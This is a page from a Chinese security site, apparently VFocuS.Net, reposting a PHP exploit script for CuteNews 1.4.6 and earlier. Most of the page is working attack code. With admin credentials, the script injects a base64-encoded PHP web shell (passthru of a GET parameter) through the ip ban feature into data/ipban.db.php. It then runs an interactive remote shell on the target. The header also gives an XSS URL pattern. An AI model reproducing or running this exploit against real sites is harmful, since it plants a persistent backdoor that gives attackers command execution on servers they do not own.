首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 CuteNews <= 1.4.6 (ip ban) XSS/Command Execution Exploit (adm req.) 来源：staker[at]hotmail[dot]it 作者：athos 发布时间：2009-01-09   #!/usr/bin/php -q <?php /********************************************************************* * CuteNews <= 1.4.6 (ip ban) XSS / Remote Command Execution Exploit * * by athos - staker[at]hotmail[dot]it                               * * http://cutephp.com                                                * *-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--* * Remote Command Execution                                          * *-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--* * you need a super account (administrator)                          * * so you can write in ipban.db.php anything ;)                      * *                                                                   * * works regardless of php.ini settings! enjoy your ais              * * note: this vuln is a privilege escalation                         *  *                                                                   * *-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--* * Cross Site Scripting                                              * *-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--*           * http://[host]/[path]//index.php?mod=[Javascript Code]             * *********************************************************************/ error_reporting(0); list($cli,$host,$path,$username,$password) = $argv; if ($argc != 5) {          print "\n+-------------------------------------------------------------+\n";     print "\r| CuteNews <= 1.4.6 (ip ban) Remote Command Execution Exploit |\n";     print "\r+-------------------------------------------------------------+\n";     print "\rby athos - staker[at]hotmail[dot]it / http://cutephp.com\n\n";     print "\rUsage: php xpl.php [host] [path] [username] [password]\n\n";     print "\rhost     + localhost\n";     print "\rpath     + /cutenews\n";     print "\rusername + admin username\n";     print "\rpassword + admin password\n\n";     exit;      }         exploit(); function login () {         global $username,$password;         $cookies .= "username={$username}; md5_password=";     $cookies .= md5($password);          return $cookies; }    function check_login() {         global $host,$path;         $auth .= login();         $data .= "GET /{$path}/index.php HTTP/1.1\r\n";     $data .= "Host: {$host}\r\n";     $data .= "User-Agent: Lynx (textmode)\r\n";     $data .= "Cookie: $auth;\n";     $data .= "Connection: close\r\n\r\n";         if (preg_match('/Welcome/i',$data)) {         return true;     }     else {         die("Login Failed\n");     }    } function exploit() {     global $host,$path;         $login  = login();     $shell = "PD9waHAgDQpwYXNzdGhydSgkX0dFVFsnYyddKTsgDQo/Pg==";         $shell = base64_decode($shell);     $post  = "add_ip={$shell}&action=add&mod=ipban";         $data .= "POST /{$path}/index.php HTTP/1.1\r\n";     $data .= "Host: {$host}\r\n";     $data .= "User-Agent: Lynx (textmode)\r\n";     $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";     $data .= "Cookie: $login\r\n";     $data .= "Referer: http://{$host}/{$path}/index.php\r\n";     $data .= "Content-Type: application/x-www-form-urlencoded\r\n";     $data .= "Content-Length: ".strlen($post)."\r\n\r\n";     $data .= "{$post}\r\n\r\n";                if (eregi('passthru',data_send($host,$data))) {         yeat_shell();     }     else {         die("Exploit Failed!\n");     }                 } function yeat_shell() {         while (1) {         echo "yeat[shell]~$: ";         $exec = stripslashes(trim(fgets(STDIN)));                  if (preg_match('/^(exit|--exit|quit|--quit)$/i',$exec)) die("\nExited\n");         if (preg_match('/^(help|--help)$/i',$exec)) echo("\nExample: uname -a\n");         if (preg_match('/^(about|--about)$/i',$exec)) echo("\nstaker[at]hotmail[dot]it\n");                 print data_exec($exec);         } } function data_exec($exec) {         global $host,$path;         $exec = urlencode($exec);     $data .= "GET /{$path}/data/ipban.db.php?c={$exec} HTTP/1.1\r\n";     $data .= "Host: {$host}\r\n";     $data .= "User-Agent: Lynx (textmode)\r\n";     $data .= "Connection: close\r\n\r\n";         $html = data_send ($host,$data);     $html = str_replace('|0||',null,$html);     return $html; } function data_send ($host,$data) {        if (!$sock = @fsockopen($host,80)) {         die("Connection refused,try again!\n");     }   fputs($sock,$data);         while (!feof($sock)) { $html .= fgets($sock); }         fclose($sock);     return $html; }     [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·GOM Player 2.0.12.3375 (.ASX F ·Pizzis CMS <= 1.5.1 (visualizz ·XOOPS 2.3.2 (mydirname) Remote ·WinAmp GEN_MSN Plugin Heap Buf ·Anope IRC Services With bs_fan ·VUPlayer <= 2.49 .PLS Universa ·IntelliTamper (2.07/2.08) Lang ·Audacity 1.6.2 (.aup File) Rem ·Virgilio Toolbar Toolbar Activ ·Perception LiteServe 2.0.1 (us ·VMware COM DB ActiveX Remote B ·CoolPlayer BUILD 219 (Playlist   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved